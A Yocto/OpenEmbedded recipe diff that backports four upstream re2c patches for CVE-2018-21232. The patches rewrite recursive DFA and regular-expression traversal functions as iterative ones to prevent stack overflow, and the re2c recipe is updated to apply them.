diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch
new file mode 100644
index 0000000000..b7dcaefad3
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch
@@ -0,0 +1,347 @@
+From fd634998f813340768c333cdad638498602856e5 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Tue, 21 Apr 2020 21:28:32 +0100
+Subject: [PATCH] Rewrite recursion into iteration (Tarjan's SCC algorithm and
+ YYFILL states).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Stack overflow reported by Agostino Sarubbo.
+Related to #219 "overflow-1.re test fails on system with small stack".
+
+Upstram-Status: Backport:
+https://github.com/skvadrik/re2c/commit/fd634998f813340768c333cdad638498602856e5
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/dfa/fillpoints.cc b/src/dfa/fillpoints.cc
+--- a/src/dfa/fillpoints.cc	(revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/dfa/fillpoints.cc	(date 1646929180243)
+@@ -5,151 +5,186 @@
+ 
+ #include "src/dfa/dfa.h"
+ 
+-namespace re2c
+-{
++
++/*
++ * note [finding strongly connected components of DFA]
++ *
++ * A slight modification of Tarjan's algorithm.
++ *
++ * The algorithm traverses the DFA in depth-first order. It maintains a stack
++ * of states that have already been visited but haven't been assigned to an SCC
++ * yet. For each state the algorithm calculates 'lowlink': index of the highest
++ * ancestor state reachable in one step from a descendant of this state.
++ * Lowlink is used to determine when a set of states should be popped off stack
++ * into a new SCC.
++ *
++ * We use lowlink to hold different kinds of information:
++ *   - values in range [0 .. stack size] mean that the state is on stack (a
++ *     link to a state with the smallest index reachable from this one)
++ *   - SCC_UND means that this state has not been visited yet
++ *   - SCC_INF means that this state has already been popped off stack
++ *
++ * We use stack size (rather than topological sort index) as a unique index of
++ * the state on stack. This is safe because the indices of states on stack are
++ * unique and less than the indices of states that have been popped off stack
++ * (SCC_INF).
++ */
++
++namespace re2c {
++    namespace {
+ 
+-static const size_t SCC_INF = std::numeric_limits<size_t>::max();
+-static const size_t SCC_UND = SCC_INF - 1;
++        static const size_t SCC_INF = std::numeric_limits<size_t>::max();
++        static const size_t SCC_UND = SCC_INF - 1;
+ 
+-static bool loopback(size_t node, size_t narcs, const size_t *arcs)
+-{
+-	for (size_t i = 0; i < narcs; ++i)
+-	{
+-		if (arcs[i] == node)
+-		{
+-			return true;
+-		}
+-	}
+-	return false;
+-}
++        static bool loopback(size_t state, size_t narcs, const size_t *arcs)
++        {
++            for (size_t i = 0; i < narcs; ++i) {
++                if (arcs[i] == state) return true;
++            }
++            return false;
++        }
+ 
+-/*
+- * node [finding strongly connected components of DFA]
+- *
+- * A slight modification of Tarjan's algorithm.
+- *
+- * The algorithm walks graph in deep-first order. It maintains a stack
+- * of nodes that have already been visited but haven't been assigned to
+- * SCC yet. For each node the algorithm calculates 'lowlink': index of
+- * the highest ancestor node reachable in one step from a descendant of
+- * the node. Lowlink is used to determine when a set of nodes should be
+- * popped off the stack into a new SCC.
+- *
+- * We use lowlink to hold different kinds of information:
+- *   - values in range [0 .. stack size] mean that this node is on stack
+- *     (link to a node with the smallest index reachable from this one)
+- *   - SCC_UND means that this node has not been visited yet
+- *   - SCC_INF means that this node has already been popped off stack
+- *
+- * We use stack size (rather than topological sort index) as unique index
+- * of a node on stack. This is safe because indices of nodes on stack are
+- * still unique and less than indices of nodes that have been popped off
+- * stack (SCC_INF).
+- *
+- */
+-static void scc(
+-	const dfa_t &dfa,
+-	std::stack<size_t> &stack,
+-	std::vector<size_t> &lowlink,
+-	std::vector<bool> &trivial,
+-	size_t i)
+-{
+-	const size_t link = stack.size();
+-	lowlink[i] = link;
+-	stack.push(i);
++        struct StackItem {
++            size_t state;  // current state
++            size_t symbol; // next arc to be visited in this state
++            size_t link;   // Tarjan's "lowlink"
++        };
++
++// Tarjan's algorithm
++        static void scc(const dfa_t &dfa, std::vector<bool> &trivial,
++                        std::vector<StackItem> &stack_dfs)
++        {
++            std::vector<size_t> lowlink(dfa.states.size(), SCC_UND);
++            std::stack<size_t> stack;
++
++            StackItem x0 = {0, 0, 0};
++            stack_dfs.push_back(x0);
++
++            while (!stack_dfs.empty()) {
++                const size_t i = stack_dfs.back().state;
++                size_t c = stack_dfs.back().symbol;
++                size_t link = stack_dfs.back().link;
++                stack_dfs.pop_back();
++
++                const size_t *arcs = dfa.states[i]->arcs;
++
++                if (c == 0) {
++                    // DFS recursive enter
++                    //DASSERT(lowlink[i] == SCC_UND);
++                    link = lowlink[i] = stack.size();
++                    stack.push(i);
++                }
++                else {
++                    // DFS recursive return (from one of successor states)
++                    const size_t j = arcs[c - 1];
++                    //DASSERT(lowlink[j] != SCC_UND);
++                    lowlink[i] = std::min(lowlink[i], lowlink[j]);
++                }
+ 
+-	const size_t *arcs = dfa.states[i]->arcs;
+-	for (size_t c = 0; c < dfa.nchars; ++c)
+-	{
+-		const size_t j = arcs[c];
+-		if (j != dfa_t::NIL)
+-		{
+-			if (lowlink[j] == SCC_UND)
+-			{
+-				scc(dfa, stack, lowlink, trivial, j);
+-			}
+-			if (lowlink[j] < lowlink[i])
+-			{
+-				lowlink[i] = lowlink[j];
+-			}
+-		}
+-	}
++                // find the next successor state that hasn't been visited yet
++                for (; c < dfa.nchars; ++c) {
++                    const size_t j = arcs[c];
++                    if (j != dfa_t::NIL) {
++                        if (lowlink[j] == SCC_UND) {
++                            break;
++                        }
++                        lowlink[i] = std::min(lowlink[i], lowlink[j]);
++                    }
++                }
+ 
+-	if (lowlink[i] == link)
+-	{
+-		// SCC is non-trivial (has loops) iff it either:
+-		//   - consists of multiple nodes (they all must be interconnected)
+-		//   - consists of single node which loops back to itself
+-		trivial[i] = i == stack.top()
+-			&& !loopback(i, dfa.nchars, arcs);
++                if (c < dfa.nchars) {
++                    // recurse into the next successor state
++                    StackItem x1 = {i, c + 1, link};
++                    stack_dfs.push_back(x1);
++                    StackItem x2 = {arcs[c], 0, SCC_UND};
++                    stack_dfs.push_back(x2);
++                }
++                else if (lowlink[i] == link) {
++                    // all successors have been visited
++                    // SCC is non-trivial (has loops) if either:
++                    //   - it contains multiple interconnected states
++                    //   - it contains a single self-looping state
++                    trivial[i] = i == stack.top() && !loopback(i, dfa.nchars, arcs);
+ 
+-		size_t j;
+-		do
+-		{
+-			j = stack.top();
+-			stack.pop();
+-			lowlink[j] = SCC_INF;
+-		}
+-		while (j != i);
+-	}
+-}
++                    for (;;) {
++                        const size_t j = stack.top();
++                        stack.pop();
++                        lowlink[j] = SCC_INF;
++                        if (i == j) break;
++                    }
++                }
++            }
++        }
+ 
+-static void calc_fill(
+-	const dfa_t &dfa,
+-	const std::vector<bool> &trivial,
+-	std::vector<size_t> &fill,
+-	size_t i)
+-{
+-	if (fill[i] == SCC_UND)
+-	{
+-		fill[i] = 0;
+-		const size_t *arcs = dfa.states[i]->arcs;
+-		for (size_t c = 0; c < dfa.nchars; ++c)
+-		{
+-			const size_t j = arcs[c];
+-			if (j != dfa_t::NIL)
+-			{
+-				calc_fill(dfa, trivial, fill, j);
+-				size_t max = 1;
+-				if (trivial[j])
+-				{
+-					max += fill[j];
+-				}
+-				if (max > fill[i])
+-				{
+-					fill[i] = max;
+-				}
+-			}
+-		}
+-	}
+-}
+-
+-void fillpoints(const dfa_t &dfa, std::vector<size_t> &fill)
+-{
+-	const size_t size = dfa.states.size();
+-
+-	// find DFA states that belong to non-trivial SCC
+-	std::stack<size_t> stack;
+-	std::vector<size_t> lowlink(size, SCC_UND);
+-	std::vector<bool> trivial(size, false);
+-	scc(dfa, stack, lowlink, trivial, 0);
+-
+-	// for each DFA state, calculate YYFILL argument:
+-	// maximal path length to the next YYFILL state
+-	fill.resize(size, SCC_UND);
+-	calc_fill(dfa, trivial, fill, 0);
++        static void calc_fill(const dfa_t &dfa, const std::vector<bool> &trivial,
++                              std::vector<StackItem> &stack_dfs, std::vector<size_t> &fill)
++        {
++            const size_t nstates = dfa.states.size();
++            fill.resize(nstates, SCC_UND);
++
++            StackItem x0 = {0, 0, SCC_INF};
++            stack_dfs.push_back(x0);
++
++            while (!stack_dfs.empty()) {
++                const size_t i = stack_dfs.back().state;
++                size_t c = stack_dfs.back().symbol;
++                stack_dfs.pop_back();
++
++                const size_t *arcs = dfa.states[i]->arcs;
++
++                if (c == 0) {
++                    // DFS recursive enter
++                    if (fill[i] != SCC_UND) continue;
++                    fill[i] = 0;
++                }
++                else {
++                    // DFS recursive return (from one of successor states)
++                    const size_t j = arcs[c - 1];
++                    //DASSERT(fill[i] != SCC_UND && fill[j] != SCC_UND);
++                    fill[i] = std::max(fill[i], 1 + (trivial[j] ? fill[j] : 0));
++                }
++
++                // find the next successor state that hasn't been visited yet
++                for (; c < dfa.nchars; ++c) {
++                    const size_t j = arcs[c];
++                    if (j != dfa_t::NIL) break;
++                }
++
++                if (c < dfa.nchars) {
++                    // recurse into the next successor state
++                    StackItem x1 = {i, c + 1, SCC_INF};
++                    stack_dfs.push_back(x1);
++                    StackItem x2 = {arcs[c], 0, SCC_INF};
++                    stack_dfs.push_back(x2);
++                }
++            }
+ 
+-	// The following states must trigger YYFILL:
+-	//   - inital state
+-	//   - all states in non-trivial SCCs
+-	// for other states, reset YYFILL argument to zero
+-	for (size_t i = 1; i < size; ++i)
+-	{
+-		if (trivial[i])
+-		{
+-			fill[i] = 0;
+-		}
+-	}
+-}
++            // The following states must trigger YYFILL:
++            //   - inital state
++            //   - all states in non-trivial SCCs
++            // for other states, reset YYFILL argument to zero
++            for (size_t i = 1; i < nstates; ++i) {
++                if (trivial[i]) {
++                    fill[i] = 0;
++                }
++            }
++        }
+ 
++    } // anonymous namespace
++
++    void fillpoints(const dfa_t &dfa, std::vector<size_t> &fill)
++    {
++        const size_t nstates = dfa.states.size();
++        std::vector<bool> trivial(nstates, false);
++        std::vector<StackItem> stack_dfs;
++        stack_dfs.reserve(nstates);
++
++        // find DFA states that belong to non-trivial SCC
++        scc(dfa, trivial, stack_dfs);
++
++        // for each DFA state, calculate YYFILL argument:
++        // maximal path length to the next YYFILL state
++        calc_fill(dfa, trivial, stack_dfs, fill);
++    }
++
+ } // namespace re2c
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch
new file mode 100644
index 0000000000..820a6decbc
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch
@@ -0,0 +1,243 @@
+From 7b5643476bd99c994c4f51b8143f942982d85521 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Wed, 22 Apr 2020 22:37:24 +0100
+Subject: [PATCH] Rewrite recursion into iteration (fixed tags computation).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Partial fix for #219 "overflow-1.re test fails on system with small stack".
+
+Upstream-Stauts: Backport:
+https://github.com/skvadrik/re2c/commit/7b5643476bd99c994c4f51b8143f942982d85521
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/re/tag.cc b/src/re/tag.cc
+--- a/src/re/tag.cc	(revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/re/tag.cc	(date 1646986908580)
+@@ -6,7 +6,7 @@
+ {
+ 
+ const size_t Tag::RIGHTMOST = std::numeric_limits<size_t>::max();
+-const size_t Tag::VARDIST = std::numeric_limits<size_t>::max();
++const uint32_t Tag::VARDIST = std::numeric_limits<uint32_t>::max();
+ const size_t Tag::FICTIVE = Tag::RIGHTMOST - 1;
+ 
+ } // namespace re2c
+
+
+diff --git a/src/re/tag.h b/src/re/tag.h
+--- a/src/re/tag.h	(revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/re/tag.h	(date 1646986922376)
+@@ -19,7 +19,7 @@
+ struct Tag
+ {
+ 	static const size_t RIGHTMOST;
+-	static const size_t VARDIST;
++    static const uint32_t VARDIST;
+ 	static const size_t FICTIVE;
+ 
+ 	const std::string *name;
+
+
+diff --git a/src/re/fixed_tags.cc b/src/re/fixed_tags.cc
+--- a/src/re/fixed_tags.cc	(revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/re/fixed_tags.cc	(date 1646991137317)
+@@ -7,78 +7,131 @@
+ #include "src/re/tag.h"
+ 
+ namespace re2c {
++namespace {
+ 
+ /* note [fixed and variable tags]
+  *
+- * If distance between two tags is constant (equal for all strings that
+- * match the given regexp), then lexer only needs to track one of them:
+- * the second tag equals the first tag plus static offset.
++ * If distance between two tags is constant (equal for all strings that match
++ * the given regexp), then lexer only needs to track one of them: the second
++ * tag equals the first tag plus static offset.
+  *
+- * However, this optimization is applied only to tags in top-level
+- * concatenation, because other tags may be uninitialized and we don't
+- * want to mess with conditional calculation of fixed tags.
+- *
++ * This optimization is applied only to tags in top-level concatenation,
++ * because in other cases the base tag may be NULL, and the calculation of
++ * the fixed tag value is not as simple as substracting a fixed offset.
+  * Furthermore, fixed tags are fobidden with generic API because it cannot
+- * express fixed offsets.
+- *
+- * Tags with history also cannot be fixed.
++ * express fixed offsets. M-tags (with history) also cannot be fixed.
+  *
+  * Another special case is fictive tags (those that exist only to impose
+- * hierarchical laws of POSIX disambiguation). We treat them as fixed
+- * in order to suppress code generation.
++ * hierarchical laws of POSIX disambiguation). We treat them as fixed in order
++ * to suppress code generation.
+  */
+ 
+-static void find_fixed_tags(RE *re, std::vector<Tag> &tags,
+-	size_t &dist, size_t &base, bool toplevel)
++struct StackItem {
++    RE       *re;       // current sub-RE
++    uint32_t  dist;     // distance backup for alternative, unused for other RE
++    uint8_t   succ;     // index of the next successor to be visited
++    bool      toplevel; // if this sub-RE is in top-level concatenation
++};
++
++static void find_fixed_tags(RESpec &spec, std::vector<StackItem> &stack, RE *re0)
+ {
+-	switch (re->type) {
+-		case RE::NIL: break;
+-		case RE::SYM:
+-			if (dist != Tag::VARDIST) ++dist;
+-			break;
+-		case RE::ALT: {
+-			size_t d1 = dist, d2 = dist;
+-			find_fixed_tags(re->alt.re1, tags, d1, base, false);
+-			find_fixed_tags(re->alt.re2, tags, d2, base, false);
+-			dist = (d1 == d2) ? d1 : Tag::VARDIST;
+-			break;
+-		}
+-		case RE::CAT:
+-			find_fixed_tags(re->cat.re2, tags, dist, base, toplevel);
+-			find_fixed_tags(re->cat.re1, tags, dist, base, toplevel);
+-			break;
+-		case RE::ITER:
+-			find_fixed_tags(re->iter.re, tags, dist, base, false);
+-			dist = Tag::VARDIST;
+-			break;
+-		case RE::TAG: {
+-			// see note [fixed and variable tags]
+-			Tag &tag = tags[re->tag.idx];
+-			if (fictive(tag)) {
+-				tag.base = tag.dist = 0;
+-			} else if (toplevel && dist != Tag::VARDIST && !history(tag)) {
+-				tag.base = base;
+-				tag.dist = dist;
+-			} else if (toplevel) {
+-				base = re->tag.idx;
+-				dist = 0;
+-			}
+-			if (trailing(tag)) dist = 0;
+-			break;
+-		}
+-	}
++    static const uint32_t VARDIST = Tag::VARDIST;
++    bool toplevel = spec.opts->input_api != INPUT_CUSTOM;
++
++    // base tag, intially the fake "rightmost tag" (the end of RE)
++    size_t base = Tag::RIGHTMOST;
++
++    // the distance to the nearest top-level tag to the right (base tag)
++    uint32_t dist = 0;
++
++    const StackItem i0 = {re0, VARDIST, 0, toplevel};
++    stack.push_back(i0);
++
++    while (!stack.empty()) {
++        const StackItem i = stack.back();
++        stack.pop_back();
++        RE *re = i.re;
++
++        if (re->type == RE::SYM) {
++            if (dist != VARDIST) ++dist;
++        }
++        else if (re->type == RE::ALT) {
++            if (i.succ == 0) {
++                // save the current distance on stack (from the alternative end
++                // to base) and recurse into the left sub-RE
++                StackItem k = {re, dist, 1, i.toplevel};
++                stack.push_back(k);
++                StackItem j = {re->alt.re1, VARDIST, 0, false};
++                stack.push_back(j);
++            }
++            else if (i.succ == 1) {
++                // save the current distance on stack (from the left sub-RE to
++                // base), reset distance to the distance popped from stack (from
++                // the alternative end to base), recurse into the right sub-RE
++                StackItem k = {re, dist, 2, i.toplevel};
++                stack.push_back(k);
++                StackItem j = {re->alt.re2, VARDIST, 0, false};
++                stack.push_back(j);
++                dist = i.dist;
++            }
++            else {
++                // both sub-RE visited, compare the distance on stack (from the
++                // left sub-RE to base) to the current distance (from the right
++                // sub-RE to base), if not equal set variable distance
++                dist = (i.dist == dist) ? i.dist : VARDIST;
++            }
++        }
++        else if (re->type == RE::ITER) {
++            if (i.succ == 0) {
++                // recurse into the sub-RE
++                StackItem k = {re, VARDIST, 1, i.toplevel};
++                stack.push_back(k);
++                StackItem j = {re->iter.re, VARDIST, 0, false};
++                stack.push_back(j);
++            }
++            else {
++                // sub-RE visited, assume unknown number of iterations
++                // TODO: find precise distance for fixed repetition counter
++                dist = VARDIST;
++            }
++        }
++        else if (re->type == RE::CAT) {
++            // the right sub-RE is pushed on stack after the left sub-RE and
++            // visited earlier (because distance is computed from right to left)
++            StackItem j1 = {re->cat.re1, VARDIST, 0, i.toplevel};
++            stack.push_back(j1);
++            StackItem j2 = {re->cat.re2, VARDIST, 0, i.toplevel};
++            stack.push_back(j2);
++        }
++        else if (re->type == RE::TAG) {
++            // see note [fixed and variable tags]
++            Tag &tag = spec.tags[re->tag.idx];
++            if (fictive(tag)) {
++                tag.base = tag.dist = 0;
++            }
++            else if (i.toplevel && dist != VARDIST && !history(tag)) {
++                tag.base = base;
++                tag.dist = dist;
++            }
++            else if (i.toplevel) {
++                base = re->tag.idx;
++                dist = 0;
++            }
++            if (trailing(tag)) {
++                dist = 0;
++            }
++        }
++    }
+ }
++
++} // anonymous namespace
+ 
+-void find_fixed_tags(RESpec &spec)
+-{
+-	const bool generic = spec.opts->input_api == INPUT_CUSTOM;
+-	std::vector<RE*>::iterator
+-		i = spec.res.begin(),
+-		e = spec.res.end();
+-	for (; i != e; ++i) {
+-		size_t base = Tag::RIGHTMOST, dist = 0;
+-		find_fixed_tags(*i, spec.tags, dist, base, !generic);
+-	}
+-}
++    void find_fixed_tags(RESpec &spec)
++    {
++        std::vector<StackItem> stack;
++        for (std::vector<RE*>::iterator i = spec.res.begin(); i != spec.res.end(); ++i) {
++            find_fixed_tags(spec, stack, *i);
++        }
++    }
+ 
+-} // namespace re2c
++} // namespace re2c
+\ No newline at end of file
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch
new file mode 100644
index 0000000000..f942e21cba
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch
@@ -0,0 +1,156 @@
+From 4d9c809355b574f2a58eac119f5e076c48e4d1e2 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Thu, 23 Apr 2020 22:16:51 +0100
+Subject: [PATCH] Rewrite recursion into iteration (nullable RE).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Partial fix for #219 "overflow-1.re test fails on system with small stack".
+
+Upstream-Status: Backport:
+https://github.com/skvadrik/re2c/commit/4d9c809355b574f2a58eac119f5e076c48e4d1e2
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/re/nullable.cc b/src/re/nullable.cc
+--- a/src/re/nullable.cc	(revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/re/nullable.cc	(date 1647253886226)
+@@ -9,43 +9,100 @@
+ #include "src/re/tag.h"
+ 
+ namespace re2c {
++    namespace {
++
++        struct StackItem {
++            const RE *re;   // current sub-RE
++            uint8_t   succ; // index of the next sucessor to be visited
++        };
+ 
+-static bool nullable(const RESpec &spec, const RE *re, bool &trail)
+-{
+-	if (trail) return true;
++        static bool nullable(const RESpec &spec, std::vector<StackItem> &stack, const RE *re0)
++        {
++            // the "nullable" status of the last sub-RE visited by DFS
++            bool null = false;
+ 
+-	switch (re->type) {
+-		case RE::NIL: return true;
+-		case RE::SYM: return false;
+-		case RE::ITER:
+-			return nullable(spec, re->iter.re, trail);
+-		case RE::TAG:
+-			trail |= trailing(spec.tags[re->tag.idx]);
+-			return true;
+-		case RE::ALT:
+-			return nullable(spec, re->alt.re1, trail)
+-				|| nullable(spec, re->alt.re2, trail);
+-		case RE::CAT:
+-			return nullable(spec, re->cat.re1, trail)
+-				&& nullable(spec, re->cat.re2, trail);
+-	}
+-	return false; /* unreachable */
+-}
++            const StackItem i0 = {re0, 0};
++            stack.push_back(i0);
++
++            while (!stack.empty()) {
++                const StackItem i = stack.back();
++                stack.pop_back();
++
++                const RE *re = i.re;
++                if (re->type == RE::NIL) {
++                    null = true;
++                }
++                else if (re->type == RE::SYM) {
++                    null = false;
++                }
++                else if (re->type == RE::TAG) {
++                    null = true;
+ 
+-/*
+- * warn about rules that match empty string
+- * (including rules with nonempty trailing context)
+- * false positives on partially self-shadowed rules like [^]?
+- */
+-void warn_nullable(const RESpec &spec, const std::string &cond)
+-{
+-	const size_t nre = spec.res.size();
+-	for (size_t i = 0; i < nre; ++i) {
+-		bool trail = false;
+-		if (nullable(spec, spec.res[i], trail)) {
+-			spec.warn.match_empty_string(spec.rules[i].code->fline, cond);
+-		}
+-	}
+-}
++                    // Trailing context is always in top-level concatenation, and sub-RE
++                    // are visited from left to right. Since we are here, sub-RE to the
++                    // left of the trailing context is nullable (otherwise we would not
++                    // recurse into the right sub-RE), therefore the whole RE is nullable.
++                    if (trailing(spec.tags[re->tag.idx])) {
++                        //DASSERT(stack.size() == 1 && stack.back().re->type == RE::CAT);
++                        stack.pop_back();
++                        break;
++                    }
++                }
++                else if (re->type == RE::ALT) {
++                    if (i.succ == 0) {
++                        // recurse into the left sub-RE
++                        StackItem k = {re, 1};
++                        stack.push_back(k);
++                        StackItem j = {re->alt.re1, 0};
++                        stack.push_back(j);
++                    }
++                    else if (!null) {
++                        // if the left sub-RE is nullable, so is alternative, so stop
++                        // recursion; otherwise recurse into the right sub-RE
++                        StackItem j = {re->alt.re2, 0};
++                        stack.push_back(j);
++                    }
++                }
++                else if (re->type == RE::CAT) {
++                    if (i.succ == 0) {
++                        // recurse into the left sub-RE
++                        StackItem k = {re, 1};
++                        stack.push_back(k);
++                        StackItem j = {re->cat.re1, 0};
++                        stack.push_back(j);
++                    }
++                    else if (null) {
++                        // if the left sub-RE is not nullable, neither is concatenation,
++                        // so stop recursion; otherwise recurse into the right sub-RE
++                        StackItem j = {re->cat.re2, 0};
++                        stack.push_back(j);
++                    }
++                }
++                else if (re->type == RE::ITER) {
++                    // iteration is nullable if the sub-RE is nullable
++                    // (zero repetitions is represented with alternative)
++                    StackItem j = {re->iter.re, 0};
++                    stack.push_back(j);
++                }
++            }
++
++            //DASSERT(stack.empty());
++            return null;
++        }
++
++    } // anonymous namespace
++
++// Warn about rules that match empty string (including rules with nonempty
++// trailing context). False positives on partially self-shadowed rules like [^]?
++    void warn_nullable(const RESpec &spec, const std::string &cond)
++    {
++        std::vector<StackItem> stack;
++        const size_t nre = spec.res.size();
++        for (size_t i = 0; i < nre; ++i) {
++            if (nullable(spec, stack, spec.res[i])) {
++                spec.warn.match_empty_string(spec.rules[i].code->fline, cond);
++            }
++        }
++    }
+ 
+ } // namespace re2c
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch
new file mode 100644
index 0000000000..ee8d84b1bc
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch
@@ -0,0 +1,166 @@
+From 89be91f3df00657261870adbc590209fdb2bc405 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Thu, 23 Apr 2020 23:02:21 +0100
+Subject: [PATCH] Rewrite recursion into iteration (estimation of NFA size for
+ RE).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Partial fix for #219 "overflow-1.re test fails on system with small stack".
+
+Upstram-Status: Backport:
+https://github.com/skvadrik/re2c/commit/89be91f3df00657261870adbc590209fdb2bc405
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/nfa/estimate_size.cc b/src/nfa/estimate_size.cc
+--- a/src/nfa/estimate_size.cc	(revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/nfa/estimate_size.cc	(date 1647005399735)
+@@ -6,41 +6,113 @@
+ #include "src/re/re.h"
+ 
+ namespace re2c {
++namespace {
++
++struct StackItem {
++    const RE *re;   // current sub-RE
++    uint32_t  size; // size of the sub-RE (only for alternative and concatenation)
++    uint8_t   succ; // index of the next sucessor to be visited
++};
+ 
+-static size_t estimate(const RE *re)
++static uint32_t estimate_re_size(const RE *re0, std::vector<StackItem> &stack)
+ {
+-	switch (re->type) {
+-		case RE::NIL: return 0;
+-		case RE::SYM: return 1;
+-		case RE::TAG: return 1;
+-		case RE::ALT:
+-			return estimate(re->alt.re1)
+-				+ estimate(re->alt.re2)
+-				+ 1;
+-		case RE::CAT:
+-			return estimate(re->cat.re1)
+-				+ estimate(re->cat.re2);
+-		case RE::ITER: {
+-			const size_t
+-				iter = estimate(re->iter.re),
+-				min = re->iter.min,
+-				max = re->iter.max;
+-			return max == AST::MANY
+-				? iter * min + 1
+-				: iter * max + (max - min);
+-		}
+-	}
+-	return 0; /* unreachable */
+-}
++    // the estimated size of the last sub-RE visited by DFS
++    uint32_t size = 0;
++
++    const StackItem i0 = {re0, 0, 0};
++    stack.push_back(i0);
++
++    while (!stack.empty()) {
++        const StackItem i = stack.back();
++        stack.pop_back();
++
++        const RE *re = i.re;
++        if (re->type == RE::NIL) {
++            size = 0;
++        }
++        else if (re->type == RE::SYM || re->type == RE::TAG) {
++            size = 1;
++        }
++        else if (re->type == RE::ALT) {
++            if (i.succ == 0) {
++                // recurse into the left sub-RE
++                StackItem k = {re, 0, 1};
++                stack.push_back(k);
++                StackItem j = {re->alt.re1, 0, 0};
++                stack.push_back(j);
++            }
++            else if (i.succ == 1) {
++                // recurse into the right sub-RE
++                StackItem k = {re, size, 2};
++                stack.push_back(k);
++                StackItem j = {re->alt.re2, 0, 0};
++                stack.push_back(j);
++            }
++            else {
++                // both sub-RE visited, recursive return
++                size = i.size // left sub-RE (saved on stack)
++                       + size    // right sub-RE (just visited by DFS)
++                       + 1;      // additional state for alternative
++            }
++        }
++        else if (re->type == RE::CAT) {
++            if (i.succ == 0) {
++                // recurse into the left sub-RE
++                StackItem k = {re, 0, 1};
++                stack.push_back(k);
++                StackItem j = {re->cat.re1, 0, 0};
++                stack.push_back(j);
++            }
++            else if (i.succ == 1) {
++                // recurse into the right sub-RE
++                StackItem k = {re, size, 2};
++                stack.push_back(k);
++                StackItem j = {re->cat.re2, 0, 0};
++                stack.push_back(j);
++            }
++            else {
++                // both sub-RE visited, recursive return
++                size = i.size // left sub-RE (saved on stack)
++                       + size;   // right sub-RE (just visited by DFS)
++            }
++        }
++        else if (re->type == RE::ITER) {
++            if (i.succ == 0) {
++                // recurse into the sub-RE
++                StackItem k = {re, 0, 1};
++                stack.push_back(k);
++                StackItem j = {re->iter.re, 0, 0};
++                stack.push_back(j);
++            }
++            else {
++                // sub-RE visited, recursive return
++                const uint32_t min = re->iter.min, max = re->iter.max;
++                size = max == AST::MANY
++                       ? size * min + 1
++                       : size * max + (max - min);
++            }
++        }
++    }
++
++    //DASSERT(stack.empty());
++    return size;
++}
++
++} // anonymous namespace
+ 
+ size_t estimate_size(const std::vector<RE*> &res)
+ {
+-	const size_t nre = res.size();
+-	size_t size = nre - 1;
+-	for (size_t i = 0; i < nre; ++i) {
+-		size += estimate(res[i]) + 1;
+-	}
+-	return size;
++    std::vector<StackItem> stack;
++
++    const size_t nre = res.size();
++    //DASSERT(nre > 0);
++    size_t size = nre - 1;
++
++    for (size_t i = 0; i < nre; ++i) {
++        size += estimate_re_size(res[i], stack) + 1;
++    }
++
++    return size;
+ }
+ 
+ } // namespace re2c
+
diff --git a/meta/recipes-support/re2c/re2c_1.0.1.bb b/meta/recipes-support/re2c/re2c_1.0.1.bb
index 35200ecde8..ca5c33f151 100644
--- a/meta/recipes-support/re2c/re2c_1.0.1.bb
+++ b/meta/recipes-support/re2c/re2c_1.0.1.bb
@@ -1,11 +1,17 @@
 SUMMARY = "Tool for writing very fast and very flexible scanners"
-HOMEPAGE = "http://re2c.sourceforge.net/"
+DESCRIPTION = "A free and open-source lexer generator for C, C++ and Go. It compiles regular expressions to determinisitic finite automata and encodes the automata in the form of a program in the target language. Unlike any other such tool, re2c focuses on generating high efficient code for regular expression matching. As a result this allows a much broader range of use than any traditional lexer."
+HOMEPAGE = "http://re2c.org/"
+BUGTRACKER = "https://github.com/skvadrik/re2c/issues"
 AUTHOR = "Marcus Börger <helly@users.sourceforge.net>"
 SECTION = "devel"
 LICENSE = "PD"
 LIC_FILES_CHKSUM = "file://README;beginline=146;md5=881056c9add17f8019ccd8c382ba963a"
 
-SRC_URI = "https://github.com/skvadrik/re2c/releases/download/${PV}/${BPN}-${PV}.tar.gz"
+SRC_URI = "https://github.com/skvadrik/re2c/releases/download/${PV}/${BPN}-${PV}.tar.gz \
+file://CVE-2018-21232-1.patch \
+file://CVE-2018-21232-2.patch \
+file://CVE-2018-21232-3.patch \
+file://CVE-2018-21232-4.patch"
